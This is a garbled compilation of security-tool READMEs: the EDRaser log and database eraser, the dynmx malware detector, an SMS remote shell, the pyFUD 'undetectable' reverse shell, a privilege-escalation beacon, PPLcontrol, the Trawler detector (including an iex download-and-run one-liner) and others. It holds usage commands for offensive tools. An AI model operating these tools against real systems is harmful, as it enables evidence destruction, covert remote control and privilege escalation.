is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:
tox
For a more elaborate explanation on how to build and test the project, please see the documentation.
EDRaser is a powerful tool for remotely deleting access logs, Windows event logs, databases, and other files on remote machines. It offers two modes of operation: automated and manual.
In automated mode, EDRaser scans the C class of a given address space of IPs for vulnerable systems and attacks them automatically. The attacks in auto mode are:
To use EDRaser in automated mode, follow these steps:
python edraser.py --auto
In manual mode, you can select specific attacks to launch against a targeted system, giving you greater control. Note that some attacks, such as VMX deletion, are for local machine only.
To use EDRaser in manual mode, you can use the following syntax:
python edraser.py --ip <ip_addr> --attack <attack_name> [--sigfile <signature file>]
Arguments:
--ip
: scan IP addresses in the specified range and attack vulnerable systems (default: localhost).--sigfile
: use the specified encrypted signature DB (default: signatures.db).--attack
: attack to be executed. The following attacks are available: ['vmx', 'vmdk', 'windows_security_event_log_remote', 'windows_application_event_log_local', 'syslog', 'access_logs', 'remote_db', 'local_db', 'remote_db_webserver']Optional arguments:
port
: port of remote machinedb_username
: the username of the remote DB.db_password
: the password of the remote DB.db_type
: type of the DB, EDRaser supports mysql
, sqlite
. (# Note that for sqlite, no username\password is needed)db_name
: the name of remote DB to be connected totable_name
: the name of remote table to be connected torpc_tools
: path to the VMware rpc_toolsExample:
python edraser.py --attack windows_event_log --ip 192.168.1.133
python EDRaser.py -attack remote_db -db_type mysql -db_username test_user -db_password test_password -ip 192.168.1.10
You can bring up a web interface for inserting and viewing a remote DB. it can be done by the following command: EDRaser.py -attack remote_db_webserver -db_type mysql -db_username test_user -db_password test_password -ip 192.168.1.10
This will bring up a web server on the localhost:8080 address, it will allow you to view & insert data to a remote given DB. This feature is designed to give an example of a "Real world" scenario where you have a website that you enter data into it and it keeps in inside a remote DB, You can use this feature to manually insert data into a remote DB.
In manual mode, EDRaser displays a list of available attacks. Here's a brief description of each attack:
dynmx (spoken dynamics) is a signature-based detection approach for behavioural malware features based on Windows API call sequences. In a simplified way, you can think of dynmx as a sort of YARA for API call traces (so called function logs) originating from malware sandboxes. Hence, the data basis for the detection approach are not the malware samples themselves which are analyzed statically but data that is generated during a dynamic analysis of the malware sample in a malware sandbox. Currently, dynmx supports function logs of the following malware sandboxes:
report.json
file)report.json
file)The detection approach is described in detail in the master thesis Signature-Based Detection of Behavioural Malware Features with Windows API Calls. This project is the prototype implementation of this approach and was developed in the course of the master thesis. The signatures are manually defined by malware analysts in the dynmx signature DSL and can be detected in function logs with the help of this tool. Features and syntax of the dynmx signature DSL can also be found in the master thesis. Furthermore, you can find sample dynmx signatures in the repository dynmx-signatures. In addition to detecting malware features based on API calls, dynmx can extract OS resources that are used by the malware (a so called Access Activity Model). These resources are extracted by examining the API calls and reconstructing operations on OS resources. Currently, OS resources of the categories filesystem, registry and network are considered in the model.
In the following section, examples are shown for the detection of malware features and for the extraction of resources.
For this example, we choose the malware sample with the SHA-256 hash sum c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3
. According to MalwareBazaar, the sample belongs to the malware family Amadey. There is a public VMRay analysis report of this sample available which also provides the function log traced by VMRay. This function log will be our data basis which we will use for the detection.
If we would like to know if the malware sample uses an injection technique called Process Hollowing, we can try to detect the following dynmx signature in the function log.
dynmx_signature:
meta:
name: process_hollow
title: Process Hollowing
description: Detection of Process hollowing malware feature
detection:
proc_hollow:
# Create legit process in suspended mode
- api_call: ["CreateProcess[AW]", "CreateProcessInternal[AW]"]
with:
- argument: "dwCreationFlags"
operation: "flag is set"
value: 0x4
- return_value: "return"
operation: "is not"
value: 0
store:
- name: "hProcess"
as: "proc_handle"
- name: "hThread"
as: "thread_handle"
# Injection of malicious code into memory of previously created process
- variant:
- path:
# Allocate memory with read, write, execute permission
- api_call: ["VirtualAllocE x", "VirtualAlloc", "(Nt|Zw)AllocateVirtualMemory"]
with:
- argument: ["hProcess", "ProcessHandle"]
operation: "is"
value: "$(proc_handle)"
- argument: ["flProtect", "Protect"]
operation: "is"
value: 0x40
- api_call: ["WriteProcessMemory"]
with:
- argument: "hProcess"
operation: "is"
value: "$(proc_handle)"
- api_call: ["SetThreadContext", "(Nt|Zw)SetContextThread"]
with:
- argument: "hThread"
operation: "is"
value: "$(thread_handle)"
- path:
# Map memory section with read, write, execute permission
- api_call: "(Nt|Zw)MapViewOfSection"
with:
- argument: "ProcessHandle"
operation: "is"
value: "$(proc_handle)"
- argument: "AccessProtection"
operation: "is"
value: 0x40
# Resume thread to run injected malicious code
- api_call: ["ResumeThread", "(Nt|Zw)ResumeThread"]
with:
- argument: ["hThread", "ThreadHandle"]
operation: "is"
value: "$(thread_handle)"
condition: proc_hollow as sequence
Based on the signature, we can find some DSL features that make dynmx powerful:
AND
, OR
, NOT
)If we run dynmx with the signature shown above against the function of the sample c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3
, we get the following output indicating that the signature was detected.
$ python3 dynmx.py detect -i 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json -s process_hollow.yml
|
__| _ _ _ _ _
/ | | | / |/ | / |/ |/ | /\/
\_/|_/ \_/|/ | |_/ | | |_/ /\_/
/|
\|
Ver. 0.5 (PoC), by 0x534a
[+] Parsing 1 function log(s)
[+] Loaded 1 dynmx signature(s)
[+] Starting detection process with 1 worker(s). This probably takes some time...
[+] Result
process_hollow c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt
We can get into more detail by setting the output format to detail
. Now, we can see the exact API call sequence that was detected in the function log. Furthermore, we can see that the signature was detected in the process 51f0.exe
.
$ python3 dynmx.py -f detail detect -i 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json -s process_hollow.yml
|
__| _ _ _ _ _
/ | | | / |/ | / |/ |/ | /\/
\_/|_/ \_/|/ | |_/ | | |_/ /\_/
/|
\|
Ver. 0.5 (PoC), by 0x534a
[+] Parsing 1 function log(s)
[+] Loaded 1 dynmx signature(s)
[+] Starting detection process with 1 worker(s). This probably takes some time...
[+] Result
Function log: c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt
Signature: process_hollow
Process: 51f0.exe (PID: 3768)
Number of Findings: 1
Finding 0
proc_hollow : API Call CreateProcessA (Function log line 20560, index 938)
proc_hollow : API Call VirtualAllocEx (Function log line 20566, index 944)
proc_hollow : API Call WriteProcessMemory (Function log line 20573, index 951)
proc_hollow : API Call SetThreadContext (Function log line 20574, index 952)
proc_hollow : API Call ResumeThread (Function log line 20575, index 953)
In order to extract the accessed OS resources from a function log, we can simply run the dynmx command resources
against the function log. An example of the detailed output is shown below for the sample with the SHA-256 hash sum 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9
. This is a CAPE sandbox report which is part of the Avast-CTU Public CAPEv2 Dataset.
$ python3 dynmx.py -f detail resources --input 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json
|
__| _ _ _ _ _
/ | | | / |/ | / |/ |/ | /\/
\_/|_/ \_/|/ | |_/ | | |_/ /\_/
/|
\|
Ver. 0.5 (PoC), by 0x534a
[+] Parsing 1 function log(s)
[+] Processing function log(s) with the command 'resources'...
[+] Result
Function log: 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json (/Users/sijansen/Documents/dev/dynmx_flogs/cape/Public_Avast_CTU_CAPEv2_Dataset_Full/extracted/601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json)
Process: 601941F00B194587C9E5.exe (PID: 2008)
Filesystem:
C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
C:\Windows\SysWOW64\ntdll.dll (READ)
USER32.dll (EXECUTE)
KERNEL32. dll (EXECUTE)
C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
Registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)
Process: 601941F00B194587C9E5.exe (PID: 1800)
Filesystem:
C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
C:\Windows\SysWOW64\ntdll.dll (READ)
USER32.dll (EXECUTE)
KERNEL32.dll (EXECUTE)
[...]
C:\Users\comp\AppData\Local\vscmouse (READ)
C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe:Zone.Identifier (DELETE)
Registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
[...]
Process: vscmouse.exe (PID: 900)
Filesystem:
C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
C:\Windows\SysWOW64\ntdll.dll (READ)
USER32.dll (EXECUTE)
KERNEL32.dll (EXECUTE)
C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
Registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\C urrentVersion\Setup (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)
Process: vscmouse.exe (PID: 3036)
Filesystem:
C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
C:\Windows\SysWOW64\ntdll.dll (READ)
USER32.dll (EXECUTE)
KERNEL32.dll (EXECUTE)
C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
C:\ (READ)
C:\Windows\System32\uxtheme.dll (EXECUTE)
dwmapi.dll (EXECUTE)
advapi32.dll (EXECUTE)
shell32.dll (EXECUTE)
C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe (CREATE,READ)
C:\Users\comp\AppData\Local\iproppass\iproppass.exe (DELETE)
crypt32.dll (EXECUTE)
urlmon.dll (EXECUTE)
userenv.dll (EXECUTE)
wininet.dll (EXECUTE)
wtsapi32.dll (EXECUTE)
CRYPTSP.dll (EXECUTE)
CRYPTBASE.dll (EXECUTE)
ole32.dll (EXECUTE)
OLEAUT32.dll (EXECUTE)
C:\Windows\SysWOW64\oleaut32.dll (EXECUTE)
IPHLPAPI.DLL (EXECUTE)
DHCPCSVC.DLL (EXECUTE)
C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\ (CREATE)
C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk (CREATE,READ)
Registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ )
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
[...]
Network:
24.151.31.150:465 (READ)
http://24.151.31.150:465 (READ,WRITE)
107.10.49.252:80 (READ)
http://107.10.49.252:80 (READ,WRITE)
Based on the shown output and the accessed resources, we can deduce some malware features:
601941F00B194587C9E5.exe
(PID 1800), the Zone Identifier of the file C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe
is deletedvscmouse.exe
(PID: 3036) connects to the network endpoints http://24.151.31.150:465
and http://107.10.49.252:80
The accessed resources are interesting for identifying host- and network-based detection indicators. In addition, resources can be used in dynmx signatures. A popular example is the detection of persistence mechanisms in the Registry.
In order to use the software Python 3.9 must be available on the target system. In addition, the following Python packages need to be installed:
anytree
,lxml
,pyparsing
,PyYAML
,six
andstringcase
To install the packages run the pip3
command shown below. It is recommended to use a Python virtual environment instead of installing the packages system-wide.
pip3 install -r requirements.txt
To use the prototype, simply run the main entry point dynmx.py
. The usage information can be viewed with the -h
command line parameter as shown below.
$ python3 dynmx.py -h
usage: dynmx.py [-h] [--format {overview,detail}] [--show-log] [--log LOG] [--log-level {debug,info,error}] [--worker N] {detect,check,convert,stats,resources} ...
Detect dynmx signatures in dynamic program execution information (function logs)
optional arguments:
-h, --help show this help message and exit
--format {overview,detail}, -f {overview,detail}
Output format
--show-log Show all log output on stdout
--log LOG, -l LOG log file
--log-level {debug,info,error}
Log level (default: info)
--worker N, -w N Number of workers to spawn (default: number of processors - 2)
sub-commands:
task to perform
{detect,check,convert,stats,resources}
detect Detects a dynmx signature
check Checks the syntax of dynmx signature(s)
convert Converts function logs to the dynmx generic function log format
stats Statistics of function logs
resources Resource activity derived from function log
In general, as shown in the output, several command line parameters regarding the log handling, the output format for results or multiprocessing can be defined. Furthermore, a command needs be chosen to run a specific task. Please note, that the number of workers only affects commands that make use of multiprocessing. Currently, these are the commands detect
and convert
.
The commands have specific command line parameters that can be explored by giving the parameter -h
to the command, e.g. for the detect
command as shown below.
$ python3 dynmx.py detect -h
usage: dynmx.py detect [-h] --sig SIG [SIG ...] --input INPUT [INPUT ...] [--recursive] [--json-result JSON_RESULT] [--runtime-result RUNTIME_RESULT] [--detect-all]
optional arguments:
-h, --help show this help message and exit
--recursive, -r Search for input files recursively
--json-result JSON_RESULT
JSON formatted result file
--runtime-result RUNTIME_RESULT
Runtime statistics file formatted in CSV
--detect-all Detect signature in all processes and do not stop after the first detection
required arguments:
--sig SIG [SIG ...], -s SIG [SIG ...]
dynmx signature(s) to detect
--input INPUT [INPUT ...], -i INPUT [INPUT ...]
Input files
As a user of dynmx, you can decide how the output is structured. If you choose to show the log on the console by defining the parameter --show-log
, the output consists of two sections (see listing below). The log is shown first and afterwards the results of the used command. By default, the log is neither shown in the console nor written to a log file (which can be defined using the --log
parameter). Due to multiprocessing, the entries in the log file are not necessarily in chronological order.
|
__| _ _ _ _ _
/ | | | / |/ | / |/ |/ | /\/
\_/|_/ \_/|/ | |_/ | | |_/ /\_/
/|
\|
Ver. 0.5 (PoC), by 0x534a
[+] Log output
2023-06-27 19:07:38,068+0000 [INFO] (__main__) [PID: 13315] []: Start of dynmx run
[...]
[+] End of log output
[+] Result
[...]
The level of detail of the result output can be defined using the command line parameter --output-format
which can be set to overview
for a high-level result or to detail
for a detailed result. For example, if you define the output format to detail
, detection results shown in the console will contain the exact API calls and resources that caused the detection. The overview output format will just indicate what signature was detected in which function log.
Detection of a dynmx signature in a function log with one worker process
python3 dynmx.py -w 1 detect -i "flog.txt" -s dynmx_signature.yml
Conversion of a function log to the dynmx generic function log format
python3 dynmx.py convert -i "flog.txt" -o /tmp/
Check a signature (only basic sanity checks)
python3 dynmx.py check -s dynmx_signature.yml
Get a detailed list of used resources used by a malware sample based on the function log (access activity model)
python3 dynmx.py -f detail resources -i "flog.txt"
Please consider that this tool is a proof-of-concept which was developed besides writing the master thesis. Hence, the code quality is not always the best and there may be bugs and errors. I tried to make the tool as robust as possible in the given time frame.
The best way to troubleshoot errors is to enable logging (on the console and/or to a log file) and set the log level to debug
. Exception handlers should write detailed errors to the log which can help troubleshooting.
PoC for an SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers.
This tool came as an insipiration during a research on eSIM security implications led by Markus Vervier, presented at Offensivecon 2023
This is not a complete C2 but rather a simple Proof of Concept for executing commands remotely over SMS.
For the shell to work you need to devices capable of sending SMS. The victim's computer should be equiped with WWAN module with either a physical SIM or eSIM deployed.
On the operator's end, two tools are provided:
Of course, you could in theory use any online SMS provider on the operator's end via their API.
On the victim simply execute the client-agent.exe
binary. If the agent is compiled as a Console Application
you should see some verbose messages. If it's compiled as a Windows Application
(best for real engagements), there will be no GUI.
The operator must specify the victim's phone number as a parameter:
server-console.exe +306912345678
Whereas if you use the python script you must additionally specify the MiFi details:
python3 server-console.py --mifi-ip 192.168.0.1 --mifi-username admin --mifi-password 12345678 --number +306912345678 -v
A demo as presented by Markus at Offensive is shown below. On the left is the operator's VM with a MiFi attached, whereas on the right window is client agent.
VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.
VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.
Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.
VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.
VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.
For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.
If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.
VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.
For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.
If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.
Before installing VTScanner, make sure you have the following prerequisites in place:
pip install -r requirements.txt
You can acquire VTScanner by cloning the GitHub repository to your local machine:
git clone https://github.com/samhaxr/VTScanner.git
To initiate VTScanner, follow these steps:
cd VTScanner
python3 VTScanner.py
VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.
VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.
A Pin Tool for tracing:
Bypasses the anti-tracing check based on RDTSC.
Generates a report in a .tag
format (which can be loaded into other analysis tools):
RVA;traced event
i.e.
345c2;section: .text
58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent
3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx
398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc
3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue
49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
...
To compile the prepared project you need to use Visual Studio >= 2012. It was tested with Intel Pin 3.28.
Clone this repo into \source\tools
that is inside your Pin root directory. Open the project in Visual Studio and build. Detailed description available here.
To build with Intel Pin < 3.26 on Windows, use the appropriate legacy Visual Studio project.
For now the support for Linux is experimental. Yet it is possible to build and use Tiny Tracer on Linux as well. Please refer tiny_runner.sh for more information. Detailed description available here.
๏ Details about the usage you will find on the project's Wiki.
install32_64
you can find a utility that checks if Kernel Debugger is disabled (kdb_check.exe
, source), and it is used by the Tiny Tracer's .bat
scripts. This utilty sometimes gets flagged as a malware by Windows Defender (it is a known false positive). If you encounter this issue, you may need to exclude the installation directory from Windows Defender scans.Questions? Ideas? Join Discussions!
Welcome to the AD Pentesting Toolkit! This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment. The scripts cover various aspects of AD enumeration, user and group management, computer enumeration, network and security analysis, and more.
The toolkit is intended for use by penetration testers, red teamers, and security professionals who want to test and assess the security of Active Directory environments. Please ensure that you have proper authorization and permission before using these scripts in any production environment.
Everyone is looking at what you are looking at; But can everyone see what he can see? You are the only difference between themโฆ By Mevlรขnรข Celรขleddรฎn-i Rรปmรฎ
The AD Pentesting Toolkit is for educational and testing purposes only. The authors and contributors are not responsible for any misuse or damage caused by the use of these scripts. Always ensure that you have proper authorization and permission before performing any penetration testing or security assessment activities on any system or network.
This project is licensed under the MIT License. The Mewtwo ASCII art is the property of Alperen Ugurlu. All rights reserved.
Trawler is a PowerShell script designed to help Incident Responders discover potential indicators of compromise on Windows hosts, primarily focused on persistence mechanisms including Scheduled Tasks, Services, Registry Modifications, Startup Items, Binary Modifications and more.
Currently, trawler can detect most of the persistence techniques specifically called out by MITRE and Atomic Red Team with more detections being added on a regular basis.
Just download and run trawler.ps1 from an Administrative PowerShell/cmd prompt - any detections will be displayed in the console as well as written to a CSV ('detections.csv') in the current working directory. The generated CSV will contain Detection Name, Source, Risk, Metadata and the relevant MITRE Technique.
Or use this one-liner from an Administrative PowerShell terminal:
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/joeavanzato/Trawler/main/trawler.ps1'))
Certain detections have allow-lists built-in to help remove noise from default Windows configurations (10/2016/2019/2022) - expected Scheduled Tasks, Services, etc. Of course, it is always possible for attackers to hijack these directly and masquerade with great detail as a default OS process - take care to use multiple forms of analysis and detection when dealing with skillful adversaries.
If you have examples or ideas for additional detections, please feel free to submit an Issue or PR with relevant technical details/references - the code-base is a little messy right now and will be cleaned up over time.
Additionally, if you identify obvious false positives, please let me know by opening an issue or PR on GitHub! The obvious culprits for this will be non-standard COMs, Services or Tasks.
-scanoptions : Tab-through possible detections and select a sub-set using comma-delimited terms (eg. .\trawler.ps1 -scanoptions Services,Processes)
-hide : Suppress Detection output to console
-snapshot : Capture a "persistence snapshot" of the current system, defaulting to "$PSScriptRoot\snapshot.csv"
-snapshotpath : Define a custom file-path for saving snapshot output to.
-outpath : Define a custom file-path for saving detection output to (defaults to "$PSScriptRoot\detections.csv")
-loadsnapshot : Define the path for an existing snapshot file to load as an allow-list reference
-drivetarget : Define the variable for a mounted target drive (eg. .\trawler.ps1 -targetdrive "D:") - using this alone leads to an 'assumed homedrive' variable of C: for analysis purposes
PersistenceSniper is an awesome tool - I've used it heavily in the past - but there are a few key points that differentiate these utilities
Overall, these tools are extremely similar but approach the problem from slightly different angles - PersistenceSniper provides all information back to the analyst for review while Trawler tries to limit what is returned to only results that are likely to be potential adversary persistence mechanisms. As such, there is a possibility for false-negatives with trawler if an adversary completely mimics an allow-listed item.
Trawler supports loading an allow-list from a 'snapshot' - to do this requires two steps.
That's it - all relevant detections will then draw from the snapshot file as an allow-list to reduce noise and identify any potential changes to the base image that may have occurred.
(Allow-listing is implemented for most of the checks but not all - still being actively implemented)
Often during an investigation, analysts may end up mounting a new drive that represents an imaged Windows device - Trawler now partially supports scanning these mounted drives through the use of the '-drivetarget' parameter.
At runtime, Trawler will re-target temporary script-level variables for use in checking file-based artifacts and also will attempt to load relevant Registry Hives (HKLM\SOFTWARE, HKLM\SYSTEM, NTUSER.DATs, USRCLASS.DATs) underneath HKLM/HKU and prefixed by 'ANALYSIS_'. Trawler will also attempt to unload these temporarily loaded hives upon script completion.
As an example, if you have an image mounted at a location such as 'F:\Test' which contains the NTFS file system ('F:\Test\Windows', 'F:\Test\User', etc) then you can invoke trawler like below;
.\trawler.ps1 -drivetarget "F:\Test"
Please note that since trawler attempts to load the registry hive files from the drive in question, mapping a UNC path to a live remote device will NOT work as those files will not be accessible due to system locks. I am working on an approach which will handle live remote devices, stay tuned.
Most other checks will function fine because they are based entirely on reading registry hives or file-based artifacts (or can be converted to do so, such as directly reading Task XML as opposed to using built-in command-lets.)
Any limitations in checks when doing drive-retargeting will be discussed more fully in the GitHub Wiki.
ย
TODO
Please be aware that some of these are (of course) more detected than others - for example, we are not detecting all possible registry modifications but rather inspecting certain keys for obvious changes and using the generic MITRE technique "Modify Registry" where no other technique is applicable. For other items such as COM hijacking, we are inspecting all entries in the relevant registry section, checking against 'known-good' patterns and bubbling up unknown or mismatched values, resulting in a much more complete detection surface for that particular technique.
This tool would not exist without the amazing InfoSec community - the most notable references I used are provided below.
PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.
Checks for Unquoted Service Paths
Checks for Autologon Registry Keys
Checks for Always Install Elevated Registry Keys
Checks for Modifiable Autoruns
Checks for Hijackable Paths
Enumerates Credentials From Credential Manager
Looks for current Token Privileges
[03/20 00:51:06] beacon> privcheck
[03/20 00:51:06] [*] Priv Esc Check Bof by @merterpreter
[03/20 00:51:06] [*] Checking For Unquoted Service Paths..
[03/20 00:51:06] [*] Checking For Autologon Registry Keys..
[03/20 00:51:06] [*] Checking For Always Install Elevated Registry Keys..
[03/20 00:51:06] [*] Checking For Modifiable Autoruns..
[03/20 00:51:06] [*] Checking For Hijackable Paths..
[03/20 00:51:06] [*] Enumerating Credentials From Credential Manager..
[03/20 00:51:06] [*] Checking For Token Privileges..
[03/20 00:51:06] [+] host called home, sent: 10485 bytes
[03/20 00:51:06] [+] received output:
Unquoted Service Path Check Result: Vulnerable service path found: c:\program files (x86)\grasssoft\macro expert\MacroService.exe
Simply load the cna file and type "privcheck"
If you want to compile by yourself you can use:make all
or x86_64-w64-mingw32-gcc -c cfile.c -o ofile.o
If you want to look for just one misconf you can use object file with "inline-execute" for example inline-execute /path/tokenprivileges.o
Mr.Un1K0d3r - Offensive Coding Portal
https://mr.un1k0d3r.world/portal/
Outflank - C2-Tool-Collection
https://github.com/outflanknl/C2-Tool-Collection
dtmsecurity - Beacon Object File (BOF) Creation Helper
https://github.com/dtmsecurity/bof_helper
Microsoft :)
https://learn.microsoft.com/en-us/windows/win32/api/
HsTechDocs by HelpSystems(Fortra)
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm
python3 based multi clients reverse shell.
1. Don't Upload Any Payloads To VirusTotal.com Bcz This tool will not work
with Time.
2. Virustotal Share Signatures With AV Comapnies.
3. Again Don't be an Idiot!
1. git clone https://github.com/machine1337/pyFUD
2. python3 server.py (enter your ip,port and start the server)
3. client.py (Edit IP AND PORT To Put Your Own IP,Port)
1. python3 server.py
2. Now Compile client.py to exe (make sure change ip and port in it)
1. Very Simple And Fully Undectable Reverse Shell
2. Multi Client Handling
3. Persistent Shell
3. auto-reconnect
5. U can Convert client.py to exe using pyinstaller tool in windows.
Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.
This script monitors a Bitcoin wallet address and notifies the user when there are changes in the balance or new transactions. It provides real-time updates on incoming and outgoing transactions, along with the corresponding amounts and timestamps. Additionally, it can play a sound notification on Windows when a new transaction occurs.
Python 3.x requests library: You can install it by running pip install requests. winsound module: This module is available by default on Windows.
python wallet_transaction_monitor.py
The script will start monitoring the wallet and display updates whenever there are changes in the balance or new transactions. It will also play the specified sound notification on Windows.
This script is designed to work on Windows due to the use of the winsound module for sound notifications. If you are using a different operating system, you may need to modify the sound-related code or use an alternative method for audio notifications. The script uses the Blockchain.info API to fetch wallet data. Please ensure you have a stable internet connection for the script to work correctly. It's recommended to run the script in the background or keep the terminal window open while monitoring the wallet.
This tool allows you to list protected processes, get the protection level of a specific process, or set an arbitrary protection level. For more information, you can read this blog post: Debugging Protected Processes.
You can get a copy of the MSI driver RTCore64.sys
here: PPLKiller/driver.
Disclaimer: it goes without saying that you should never install this driver on your host machine. Use a VM!
sc.exe create RTCore64 type= kernel start= auto binPath= C:\PATH\TO\RTCore64.sys DisplayName= "Micro - Star MSI Afterburner"
net start RTCore64
List protected processes.
PPLcontrol.exe list
Get the protection level of a specific process.
PPLcontrol.exe get 1234
Set an arbitrary protection level.
PPLcontrol.exe set 1234 PPL WinTcb
Protect a non-protected process with an arbitrary protection level. This will also automatically adjust the signature levels accordingly.
PPLcontrol.exe protect 1234 PPL WinTcb
Unprotect a protected process. This will set the protection level to 0
(i.e. None
) and the EXE/DLL signature levels to 0
(i.e. Unchecked
).
PPLcontrol.exe unprotect 1234
net stop RTCore64
sc.exe delete RTCore64
WinDbg just needs to open the target process, so you can use PPLcontrol to set an arbitrary protection level on your windbg.exe
process.
windbg.exe
process.C:\Temp>tasklist | findstr /i windbg
windbg.exe 1232 Console 1 24,840 K
C:\Temp>PPLcontrol.exe protect 1232 PPL WinTcb
[+] The Protection 'PPL-WinTcb' was set on the process with PID 1232, previous protection was: 'None-None'.
[+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1232.
In addition to opening the target process, API monitor injects a DLL into it. Therefore, setting an arbitrary protection level on your apimonitor.exe
